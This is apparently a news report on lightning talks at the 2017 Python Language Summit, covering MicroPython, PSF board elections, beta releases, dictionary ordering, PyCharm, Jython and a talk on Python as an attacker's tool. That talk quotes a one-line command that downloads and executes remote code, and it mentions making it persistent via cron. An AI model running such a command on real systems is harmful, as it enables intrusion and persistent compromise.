Language summit lightning talks

Over the course of the day, the 2017 Python Language Summit hosted a handful of lightning talks, several of which were worked into the dynamic schedule when an opportunity presented itself. They ranged from the traditional "less than five minutes" format to some that strayed well outside of that time frame—some generated a fair amount of discussion as well. Topics were all over the map: board elections, beta releases, Python as a security vulnerability, Jython, and more.

MicroPython versus CPython

The first entry here was not actually billed as a lightning talk, but it fits the model pretty well. Mark Shannon briefly described some of the differences between MicroPython and the CPython reference implementation right after lunch. MicroPython is an implementation of the language that targets microcontroller hardware; LWN looked at it running on the pyboard development hardware back in 2015.

Larry Hastings introduced the session by noting that MicroPython is the first competing implementation that has Python 3 support. Shannon held up a BBC micro:bit board, which runs MicroPython and has been given to students in the UK, and noted that it only has 16KB of memory. He asked how many attendees had 16GB in their laptops and got a few hands.

MicroPython is a severely memory-constrained version of Python 3, but it does come with most of the standard library; it even has asyncio support. It is not CPython, but is a completely new implementation of the language. The micro:bit has 256KB of flash memory and MicroPython runs from the flash. Most of the data is immutable and lives in flash as well. Hastings noted that MicroPython has a tracing garbage collector, rather than using reference counting as CPython does.
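
The practical consequence of that last difference can be sketched on CPython itself. The example below is an illustration only, not something shown at the summit: the Node class and variable names are hypothetical, and it is meant to run on CPython (it makes no assumption about which modules MicroPython provides). It shows that CPython reclaims an unreferenced object immediately, while a reference cycle survives until a tracing pass runs; code that depends on the first behavior may act differently on an implementation that only has a tracing collector.

```python
import gc
import weakref


class Node:
    """Hypothetical plain object; instances support weak references."""


gc.disable()  # keep CPython's cycle collector from running mid-demo

# Case 1: no reference cycle.
node = Node()
node_ref = weakref.ref(node)
del node
# CPython frees the object as soon as its reference count reaches zero.
# A purely tracing collector may keep it until the next collection.
freed_without_collect = node_ref() is None

# Case 2: a reference cycle, which reference counting alone cannot free.
a, b = Node(), Node()
a.other, b.other = b, a
cycle_ref = weakref.ref(a)
del a, b
alive_before_collect = cycle_ref() is not None

gc.collect()  # an explicit tracing pass reclaims the cycle
gc.enable()
freed_after_collect = cycle_ref() is None

print(freed_without_collect, alive_before_collect, freed_after_collect)
```

On CPython all three flags should come out true; on other implementations the first one is not guaranteed.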

Michael Foord spoke up to extol the micro:bit device, which costs around $20. It is "easy to play with" and has almost all of the features of Python, including the dynamic features. There is a book coming out in June about it. Overall, "it is a great, fun thing to experiment with."

PSF board

In the first real lightning talk, Hastings had a suggestion for the assembled core developers: run for the Python Software Foundation (PSF) board of directors. He noted that the 2006-2007 board was dominated by core developers (seven out of eight), while the 2016-2017 board has a single core developer (Kushal Das).

He said that he thought it would be "lovely to see more core developers" on the board, so he asked those present to nominate themselves (or other core developers) by the May 25 deadline, which was one week away when he gave the talk. When Hastings was asked if he would be running, though, he said "I don't have time for that" with a bit of a grin. In the end, the board nominations have closed; there are two core developers (Das and Thomas Wouters) on the list, which has 22 entries for 11 seats.

Why beta?

Łukasz Langa questioned the value of the beta phase for Python releases in his lightning talk. He asked: "did your company use the beta of 3.6?" The beta period is nearly five months long and is meant to "surface issues" in the code, but he is not really sure that is happening. So he is concerned that the project is not using that time well.

Furthermore: "what is the point of the 3.6.x point releases?" He wondered if a stable branch would better serve the community. But many attendees responded that the point releases were valuable and that an always-stable branch would not suit their needs.

Where Langa works, at Facebook, the point releases have not been all that helpful; they introduce regressions and "some are pretty bad". His perspective may be somewhat skewed, however, since his code base is heavily dependent on the asyncio and typing modules. But, by running his tests on code from the 3.6 branch, he was able to find a bug that was introduced after 3.6.0 and get it fixed before 3.6.1 was released.

He suggested that more people start testing before the releases are made. He has already been doing some testing on the 3.7 branch, for example. He noted that Brett Cannon has a blog post about doing that. Core developers should also be aware that there are some people out there testing what is getting committed to stable, and even development, branches.
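
One small aid for that kind of early testing is to have a test run record which interpreter it actually exercised. The sketch below is an assumption about how a project might do that, not something Langa described; describe_interpreter is a hypothetical helper, while sys.version_info and its releaselevel field are part of the standard library.

```python
import sys


def describe_interpreter(info=sys.version_info):
    """Return (version string, release level, is_prerelease) for an interpreter.

    Hypothetical helper: `info` only needs the major, minor, micro, and
    releaselevel attributes that sys.version_info provides.
    """
    version = "{}.{}.{}".format(info.major, info.minor, info.micro)
    # releaselevel is one of 'alpha', 'beta', 'candidate', or 'final'.
    prerelease = info.releaselevel != "final"
    return version, info.releaselevel, prerelease


version, level, prerelease = describe_interpreter()
print("Running tests on Python", version, "(" + level + ")")
if prerelease:
    print("Pre-release interpreter: report failures upstream before the release.")
```

Logging this at the top of a test run makes it easier to tell whether a failure came from a final release or from a build of a development branch.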

Barry Warsaw noted that Linux distributions use the betas and release candidates as they prepare for their releases. Ned Deily said that getting "more eyes on daily builds" would be great, but the point releases are important because of all the different platforms that need to be supported. But Langa is not advocating getting rid of the point releases; since there are no betas for point releases, he wants to see more testing before the release. But point releases are only for bug fixes, Deily said, not for new features. Langa is concerned that point releases also introduce regressions, however.

The beta release provides an important psychological barrier for developers, Guido van Rossum said; it is not meant for customers. Another attendee pointed out that the release candidate(s) for point releases are effectively the betas for those releases. But there is little testing of betas or release candidates, Langa said; there are always small things that are wrong and clearly have not been tested.

Beta releases do provide a platform for third-party developers, though, Deily said. Libraries and modules can test with them to ensure their code will work with the upcoming release. Python upstream does make that available, Langa said, but the external world is not really using it. The alternative is for the Python project to do more of that testing itself, Deily said.

Stable branches open up another pitfall, though, an attendee said. For example, at one point NumPy added a feature in its Git repository that needed to be changed fairly soon afterward. Unfortunately, SciPy had committed its own change based on that code, so NumPy had to carry backward compatibility hacks for a feature that was never intended to be stable. Once something has been committed to a stable branch in Git, people assume that it is completely baked; "if it breaks later, it is our problem".

Another attendee suggested that other projects are not likely to test with a beta release, but might with a release candidate. That led Hastings to jokingly suggest that Python "just cross out the word beta and replace it with rc [release candidate]". "In crayon", Warsaw added with a grin.

Ordered dictionaries

CPython 3.6 changed its dictionary implementation to one that is more compact, so it uses less memory, but that also preserves the order that keys are inserted. That resolves PEP 468, which is about preserving the order of keyword arguments in the dictionary passed to functions, but it may have an unintended side effect as well. Gregory P. Smith wanted to discuss that in his lightning talk.
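
What PEP 468 guarantees can be shown in a few lines. This is a minimal sketch assuming Python 3.6 or later; the function name and keyword names are made up for illustration.

```python
def keyword_order(**kwargs):
    # Under PEP 468 (Python 3.6 and later), kwargs preserves the order in
    # which the keyword arguments were written at the call site.
    return list(kwargs)


names = keyword_order(zebra=1, apple=2, mango=3)
print(names)
```

The list comes back in call order (zebra, apple, mango), not sorted or hash order.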

Smith is concerned that Python code will start to rely on the fact that dictionary insertion order is preserved, which is, for now, simply a CPython implementation decision. Other Python implementations may make other choices, so some code could break unexpectedly. He wondered if a change should be made for Python 3.7.

In particular, he suggested that the iteration order for dictionaries could be changed slightly. Those that need ordering could use collections.OrderedDict explicitly. He said that the disordering does not necessarily need to be random, though that would be fine; it just needs to change the order enough so that reliance on ordering would be picked up in testing.
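
The idea of perturbing the order just enough to expose hidden assumptions can be sketched in user code. The PerturbedDict class below is a hypothetical test double, not anything proposed for CPython itself, and first_key stands in for application code that quietly depends on ordering. The sketch assumes an interpreter whose plain dict preserves insertion order (CPython 3.6 or later).

```python
from collections import OrderedDict


class PerturbedDict(dict):
    """Hypothetical test double: iterates with the first key moved to the end."""

    def __iter__(self):
        keys = list(super().__iter__())
        return iter(keys[1:] + keys[:1])


def first_key(mapping):
    # Order-dependent code: assumes the first key yielded is the first inserted.
    return next(iter(mapping))


plain = {"host": "example", "port": 80, "debug": False}
perturbed = PerturbedDict(plain)
explicit = OrderedDict([("host", "example"), ("port", 80), ("debug", False)])

print(first_key(plain), first_key(perturbed), first_key(explicit))
```

With the perturbed mapping the function returns a different key, which is the kind of failure a test suite would catch; the OrderedDict version states the ordering requirement explicitly and does not depend on an implementation detail.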

He suggested that, for 3.7, either the ordering be broken or that Python declare that all dictionaries must be ordered. If the latter is done, an attendee asked, would there be a need for an UnorderedDict? Smith did not think there would be any users for that, but it could be done if needed. The issue is now on the core developers' radar, but no firm conclusion was reached in the talk.

Python as a security vulnerability

Steve Dower had a provocative title for his lightning talk: "Python is a Security Vulnerability". His point was that Python (and other, similarly powerful languages) installed on a system gives attackers a tool that can be easily used to further their aims. Normally, when we think of security vulnerabilities, we think of things like buffer overruns, but in some sense, the Python language and its libraries also qualify.

He said he often hears statements like "I love it when I find a system with Python installed ... it's basically already owned". Red teams and penetration testers love to find Python on systems they access, he said. As a thought experiment, he posited that if you could somehow get one shell command executed on a workstation inside the US National Security Agency (NSA), that command might well be something like:

python -c "exec(urlopen(...).read())"

Adding it as a cron job would be even more effective.

So, what should be done about this? The Python core development community needs to acknowledge the problem; it is the reason that many corporate networks ban Python, for example. The community should also look for ways to change Python to make things better. Creating a locked-down version of the language and libraries to make it harder for attackers to abuse might be something to consider.

PyCharm update

A brief update on the PyCharm integrated development environment (IDE) for Python was up next. Dmitry Trofimov and Andrey Vlasovskikh noted that for the first time, Python 3 use was larger than that of Python 2 in PyCharm. Almost all of the Python 2 use is 2.7, while Python 3 has mostly 3.5 and 3.6 users, though there is a lingering contingent of 3.4 users.

The PyCharm debugger now supports the PEP 523 frame evaluation API. That has sped up the debugger by 20x; it started out as a 40x improvement, but that dropped to the current level when a subtle bug was fixed. It is a rare PEP that affects the debugger, they said; there should be more of those. The API should also be considered for backporting to 2.7, they said.

They also wanted to point out the new profiler for Python, VMProf. It was developed by the PyPy project with cooperation from JetBrains, which is the company behind PyCharm. VMProf is a native profiler for Python that runs on macOS, Windows, and Linux.

Jython

The final lightning talk was given by Darjus Loktevic, who lamented the sad state of the Jython project, which is an implementation of Python for the Java virtual machine. Jython is still under development, he said, but it has a small team (2-5 active developers). The project is close to releasing Jython 2.7.1, which is more or less the same as CPython 2.7.11. It has a Jython Native Interface (JyNI) that can be used to run Python's C extensions (e.g. NumPy) in Jython.

But, he asked, is Jython still relevant today? The question came up in a Reddit thread recently, he said. The problem with Jython is that it is not Python enough to run things out of the box—tests fail, little bits and pieces are different or not supported. On the other hand, Jython is not Java enough either; it is not a great scripting language for Java and it is stuck on 2.7, which is not that great, he said.

The "killer features" for Jython are that it can call Java classes from Python code and that it lacks a global interpreter lock (GIL). Jython has had no GIL for a long time, but no one seems to care, Loktevic said. Maybe more would care if some of the other features were sorted out better.

Going forward, there will be an effort to make JyNI better, so that more C extensions can run. Also, the clamp project will allow Python code to be compiled into Java jar files so it can be directly imported into Java. Jython plans to move to GitHub and reuse the core workflow. His talk had to wind down rather abruptly at that point as the summit had run more than an hour late.

[I would like to thank the Linux Foundation for travel assistance to Portland for the summit.]

